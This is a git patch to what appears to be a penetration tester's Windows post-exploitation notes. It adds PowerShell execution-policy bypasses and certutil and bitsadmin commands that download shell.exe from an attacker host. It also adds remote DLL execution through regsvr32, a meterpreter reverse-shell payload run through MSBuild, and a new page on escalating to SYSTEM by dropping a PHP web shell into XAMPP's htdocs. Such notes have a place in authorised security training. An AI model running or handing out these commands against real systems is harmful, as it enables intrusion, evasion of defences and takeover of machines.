From 90394c598909e4cbbb78bb50f53aa5f07f8063b6 Mon Sep 17 00:00:00 2001 From: gurkenhabicht Date: Mon, 27 Nov 2023 19:35:09 +0100 Subject: [PATCH] added xampp privilege escalation --- Post Exploitation/Windows/Antivirus Evasion.md | 12 ++++++++++++ .../Windows/Living off the Land.md | 18 +++++++++++++++--- Post Exploitation/Windows/XAMPP.md | 9 +++++++++ 3 files changed, 36 insertions(+), 3 deletions(-) create mode 100644 Post Exploitation/Windows/XAMPP.md diff --git a/Post Exploitation/Windows/Antivirus Evasion.md b/Post Exploitation/Windows/Antivirus Evasion.md index 5297e42..a3a3456 100644 --- a/Post Exploitation/Windows/Antivirus Evasion.md +++ b/Post Exploitation/Windows/Antivirus Evasion.md @@ -81,6 +81,18 @@ AMSI_RESULT_BLOCKED_BY_ADMIN_END = 20479 AMSI_RESULT_DETECTED = 32768 ``` +## PowerShell Policy Bypass + +```sh +powershell -ExecutionPolicy Bypass +``` + +or just the following line + +```sh +powershell -ep bypass +``` + ### PowerShell Downgrade Attack * Downgrade Powershell version to 2.0, where no AMSI is implemented diff --git a/Post Exploitation/Windows/Living off the Land.md b/Post Exploitation/Windows/Living off the Land.md index 7a784a6..b8813ed 100644 --- a/Post Exploitation/Windows/Living off the Land.md +++ b/Post Exploitation/Windows/Living off the Land.md @@ -6,28 +6,35 @@ ## Ingress Tool Transfer -* [certutil.exe](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil), may be used for payload encoding as well +[certutil.exe](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil), may be used for payload downloads and encoding + ```sh certutil.exe -urlcache -split -f http://%ATTACKER_IP%/shell.exe C:\Windows\Temp\noshell.exe certutil.exe -encode shell.exe encoded-shell.txt ``` + * [bitsadmin](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin) + ```sh bitsadmin.exe /transfer /download /priority foreground http://%ATTACKER_IP%/shell.exe C:\Windows\Temp\noshell.exe ``` + * findstr + ```sh findstr /v dummystring \\Path\to\shell.exe > C:\Windows\Temp\noshell.exe ``` ## Indirect Command Execution -* Explorer as parent process to execute other PEs +Explorer as parent process to execute other PEs + ```sh explorer /root, "C:\Windows\System32\cmd.exe" ``` -* Windows management instrumentation +Windows management instrumentation + ```sh wmic.exe process call create calc ``` @@ -38,10 +45,12 @@ wmic.exe process call create calc * `regsvr32.exe` can execute PEs in memory, even remotely * DLL has to match architecture + ```sh C:\Windows\System32\regsvr32.exe C:\Temp\shell.dll C:\Windows\System32\regsvr32.exe /s /n /u /i:http://%ATTACKER_IP%/shell.dll shell.dll ``` + * `bash.exe -c calc.exe` ## Shortcut Modification Technique @@ -51,10 +60,13 @@ C:\Windows\System32\regsvr32.exe /s /n /u /i:http://%ATTACKER_IP%/shell.dll shel * `msfvenom` with `windows/meterpreter/reverse_winhttps` * Set `multi/handler` with `set payload windows/meterpreter/reverse_winhttps` * Transform to `*.csproj` + ```sh python2 PowerLessShell.py -type powershell -source /tmp/shell.ps1 -output shell.csproj ``` + * Execute on target + ```sh c:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe c:\Users\thm\Desktop\shell.csproj ``` diff --git a/Post Exploitation/Windows/XAMPP.md b/Post Exploitation/Windows/XAMPP.md new file mode 100644 index 0000000..42a1541 --- /dev/null +++ b/Post Exploitation/Windows/XAMPP.md @@ -0,0 +1,9 @@ +# XAMPP + +## XAMPP on Windows + +There is a way to upload a shell to escalate to `nt authority\system` +privileges through xampp. I used this multiple times in the last few days. +Upload a PHP shell like [FOZZ's +p0wny-shell](https://github.com/flozz/p0wny-shell.git) to the `C:\xampp\htdocs` +directory and visit the resource in the browser.